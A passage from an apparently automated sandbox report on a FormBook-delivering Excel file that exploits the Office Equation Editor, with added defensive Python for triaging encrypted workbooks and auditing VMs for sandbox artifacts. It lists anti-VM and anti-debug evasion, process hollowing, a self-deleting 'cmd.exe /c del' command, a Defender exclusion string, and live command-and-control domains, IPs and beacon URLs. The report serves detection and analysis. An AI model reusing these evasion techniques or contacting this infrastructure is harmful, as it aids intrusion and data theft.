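        "EncryptionInfo": b"\x04\x00\x04\x00" + bytes(rng.getrandbits(8) for _ in range(256)),
        "EncryptedPackage": bytes(rng.getrandbits(8) for _ in range(64 * 1024)),
        "\x06DataSpaces/Version": b"Microsoft.Container.DataSpaces",
    }


if __name__ == "__main__":
    for key, value in triage(constructed_sample()).items():
        print(f"{key:>28}: {value}")
```

In practice the decryption step is `msoffcrypto-tool Payment.xlsx Payment.dec.xlsx -p VelvetSweatshop`; the output is an ordinary OOXML zip, and only after that do oletools, Yara and AV engines see the embedded object that EQNEDT32.EXE later handles. Any xlsx where the static verdict is "nothing found" but `encrypted = True` should be treated as unscanned, not as clean.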

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039C4C8 pushfd ; retn 0030h 4_2_0039C4C9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039C588 push eax; ret 4_2_0039C589
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E5748 push eax; retn 007Fh 4_2_007E5751
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E6FC8 pushfd ; retf 4_2_007E6FC9
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415AFB push eax; iretd 7_2_00415B02
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3FB push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B45C push eax; ret 7_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 7_2_00414E3F push edx; retf 7_2_00414E4D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415FF0 push es; iretd 7_2_00415FF1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3DFA1 push ecx; ret 7_2_00B3DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FFDFA1 push ecx; ret 9_2_01FFDFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B3A5 push eax; ret 9_2_0009B3F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B3FB push eax; ret 9_2_0009B462
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B3F2 push eax; ret 9_2_0009B3F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_0009B45C push eax; ret 9_2_0009B462
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00095AFB push eax; iretd 9_2_00095B02
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00094E3F push edx; retf 9_2_00094E4D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00095FF0 push es; iretd 9_2_00095FF1
Source: initial sample Static PE information: section name: .text entropy: 7.63788106715

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (10 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (8 occurrences)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX (34 occurrences)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: Payment.xlsx Stream path 'EncryptedPackage' entropy: 7.99982132167 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2872, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2392 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2768 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3000 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2892 Thread sleep time: -102957s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3000 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2028 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 102957
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000008.00000000.2182958260.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000008.00000000.2174877263.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
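The memory strings above enumerate exactly what the first-stage vbc.exe loader (a .NET binary, see the mscorlib.ni.dll load earlier) checks before it unpacks: the VMware Tools key and its InstallPath, the SCSI Identifier values under HARDWARE\DEVICEMAP, the disk enumeration under Services\Disk\Enum, the display adapter entry under the {4D36E968-...} class (VMware SVGA II), the Sandboxie DLL (SBIEDLL.DLL) and the Wine export wine_get_unix_file_name. The Python below is an added example, not part of the report, that turns that list into an audit a sandbox operator can run against an analysis VM to see which of these artifacts are still exposed. The snapshot layout, the constructed VMware-guest snapshot and the value names read from each key are assumptions: InstallPath appears in the sample's strings, while Identifier, DriverDesc and the "0" enumeration value are the names Windows normally writes under those keys and are not named by the sample.

```python
"""Audit a host snapshot for the VMware / Sandboxie / Wine artifacts this loader looks for.

Added example: the check list is transcribed from the strings in the report; the snapshot
layout, the value names read from each key, and the constructed VMware-guest snapshot are
assumptions for illustration. Only collect_snapshot() touches a live registry, and only on Windows.
"""
from __future__ import annotations

import sys

DISPLAY_CLASS = r"SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000"
SCSI_LUN0 = r"HARDWARE\DEVICEMAP\Scsi\Scsi Port {port}\Scsi Bus 0\Target Id 0\Logical Unit Id 0"

# (registry key under HKLM, value name, needle). An empty value name means "key exists".
# InstallPath appears in the sample's strings; Identifier, DriverDesc and "0" are the value
# names Windows normally writes under those keys (assumption).
REGISTRY_CHECKS = [
    (r"SOFTWARE\VMware, Inc.\VMware Tools", "", ""),
    (r"SOFTWARE\VMware, Inc.\VMware Tools", "InstallPath", r"VMWARE\VMWARE TOOLS"),
    (SCSI_LUN0.format(port=1), "Identifier", "VMWARE"),
    (SCSI_LUN0.format(port=2), "Identifier", "VMWARE"),
    (r"SYSTEM\ControlSet001\Services\Disk\Enum", "0", "VMWARE"),
    (DISPLAY_CLASS, "DriverDesc", "VMWARE SVGA II"),
]
MODULE_CHECKS = {"sbiedll.dll": "Sandboxie"}                           # SBIEDLL.DLL string
EXPORT_CHECKS = {("kernel32.dll", "wine_get_unix_file_name"): "Wine"}  # WINE_GET_UNIX_FILE_NAME string


def find_vm_artifacts(snapshot: dict) -> list[str]:
    """snapshot = {"registry": {key: {value_name: data}}, "modules": [dll, ...], "exports": {dll: [func, ...]}}"""
    hits: list[str] = []
    registry = {k.lower(): {n.lower(): str(d) for n, d in v.items()}
                for k, v in snapshot.get("registry", {}).items()}
    for key, name, needle in REGISTRY_CHECKS:
        values = registry.get(key.lower())
        if values is None:
            continue
        if name == "":
            hits.append(f"registry key present: {key}")
        elif needle.lower() in values.get(name.lower(), "").lower():
            hits.append(f"{key}\\{name} contains {needle!r}")
    modules = {m.lower() for m in snapshot.get("modules", [])}
    for module, product in MODULE_CHECKS.items():
        if module in modules:
            hits.append(f"{product} module loaded: {module}")
    exports = {d.lower(): {f.lower() for f in funcs} for d, funcs in snapshot.get("exports", {}).items()}
    for (dll, func), product in EXPORT_CHECKS.items():
        if func in exports.get(dll, set()):
            hits.append(f"{product} export present: {dll}!{func}")
    return hits


def vmware_guest_snapshot() -> dict:
    """Constructed stand-in for an un-hardened VMware analysis VM (not captured from a real host)."""
    return {
        "registry": {
            r"SOFTWARE\VMware, Inc.\VMware Tools": {"InstallPath": "C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\"},
            SCSI_LUN0.format(port=1): {"Identifier": "NECVMWar VMware SATA CD01 1.00"},
            r"SYSTEM\ControlSet001\Services\Disk\Enum": {"0": r"IDE\DiskVMware_Virtual_IDE_Hard_Drive___________00000001\5&1a2b3c4d&0&0.0.0"},
            DISPLAY_CLASS: {"DriverDesc": "VMware SVGA II"},
        },
        "modules": ["ntdll.dll", "kernel32.dll"],
        "exports": {"kernel32.dll": ["GetProcAddress", "LoadLibraryW"]},
    }


def collect_snapshot() -> dict:
    """Read the same keys from the live registry; returns an empty snapshot off Windows."""
    snapshot = {"registry": {}, "modules": [], "exports": {}}
    if sys.platform != "win32":
        return snapshot
    import winreg
    for key, name, _needle in REGISTRY_CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as handle:
                snapshot["registry"].setdefault(key, {})
                if name:
                    snapshot["registry"][key][name] = winreg.QueryValueEx(handle, name)[0]
        except OSError:
            continue
    return snapshot


if __name__ == "__main__":
    live = sys.platform == "win32"
    for hit in find_vm_artifacts(collect_snapshot() if live else vmware_guest_snapshot()):
        print("artifact:", hit)
```

Two caveats when running the collector for real: the sample is a 32-bit process, so on a 64-bit guest it reads the WOW6432Node view of SOFTWARE and the audit should be run from a 32-bit interpreter (or with `winreg.KEY_WOW64_32KEY`) to see the same keys; and the explorer.exe strings in the same section (the NECVMWar VMware SATA CD01 device path) show that the CD-ROM device identity leaks into every process on the host, so renaming the VMware Tools key alone is not sufficient.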

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B10 LdrLoadDll, 7_2_00409B10
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h] 7_2_00B426F8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020026F8 mov eax, dword ptr fs:[00000030h] 9_2_020026F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 54.156.162.121 80
Source: C:\Windows\explorer.exe Network Connect: 103.5.116.132 80
Source: C:\Windows\explorer.exe Domain query: www.girlboyfriends.com
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.147 80
Source: C:\Windows\explorer.exe Domain query: www.discjockeydelraybeach.com
Source: C:\Windows\explorer.exe Domain query: www.burundiacademyst.com
Source: C:\Windows\explorer.exe Network Connect: 157.7.107.165 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.210 80
Source: C:\Windows\explorer.exe Network Connect: 108.177.174.182 80
Source: C:\Windows\explorer.exe Domain query: www.donelys.com
Source: C:\Windows\explorer.exe Domain query: www.arfjkacsgatfzbazpdth.com
Source: C:\Windows\explorer.exe Domain query: www.pipienta.com
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 310000
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Behavior Graph (ID: 404048, Sample: Payment.xlsx, Startdate: 04/05/2021, Architecture: WINDOWS, Score: 100)

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures

Process tree recovered from the graph:

EXCEL.EXE (started)
    dropped: C:\Users\user\Desktop\~$Payment.xlsx, data
EQNEDT32.EXE (started)
    contacted: will.kasraz.com 192.3.122.177, 49167, 80 AS-COLOCROSSINGUS United States
    dropped: C:\Users\user\AppData\Local\...\so[1].exe, PE32
    dropped: C:\Users\Public\vbc.exe, PE32
    signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    vbc.exe (started)
        signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
        vbc.exe (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            NAPSTAT.EXE (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe (started)
            explorer.exe (injected)
                contacted: www.discjockeydelraybeach.com 108.177.174.182, 49170, 80 LEASEWEB-USA-LAX-11US United States
                contacted: www.pipienta.com 157.7.107.165, 49174, 80 INTERQGMOInternetIncJP Japan
                contacted: 8 other IPs or domains
                signature: System process connects to network (likely due to code injection or exploit)
        vbc.exe (started)
        vbc.exe (started)

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
192.3.122.177 will.kasraz.com United States 36352 AS-COLOCROSSINGUS true
54.156.162.121 cdl-lb-1356093980.us-east-1.elb.amazonaws.com United States 14618 AMAZON-AESUS false
103.5.116.132 www.arfjkacsgatfzbazpdth.com Japan 17408 ABOVE-AS-APAboveNetCommunicationsTaiwanTW true
157.7.107.165 www.pipienta.com Japan 7506 INTERQGMOInternetIncJP true
198.54.117.210 parkingpage.namecheap.com United States 22612 NAMECHEAP-NETUS false
108.177.174.182 www.discjockeydelraybeach.com United States 395954 LEASEWEB-USA-LAX-11US true
66.235.200.147 burundiacademyst.com United States 13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.discjockeydelraybeach.com 108.177.174.182 true
will.kasraz.com 192.3.122.177 true
parkingpage.namecheap.com 198.54.117.210 true
burundiacademyst.com 66.235.200.147 true
www.arfjkacsgatfzbazpdth.com 103.5.116.132 true
cdl-lb-1356093980.us-east-1.elb.amazonaws.com 54.156.162.121 true
www.pipienta.com 157.7.107.165 true
www.burundiacademyst.com unknown unknown
www.girlboyfriends.com unknown unknown
www.donelys.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.donelys.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg==
    Malicious: true; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://www.girlboyfriends.com/8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20
    Malicious: true; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
http://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20
    Malicious: true; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown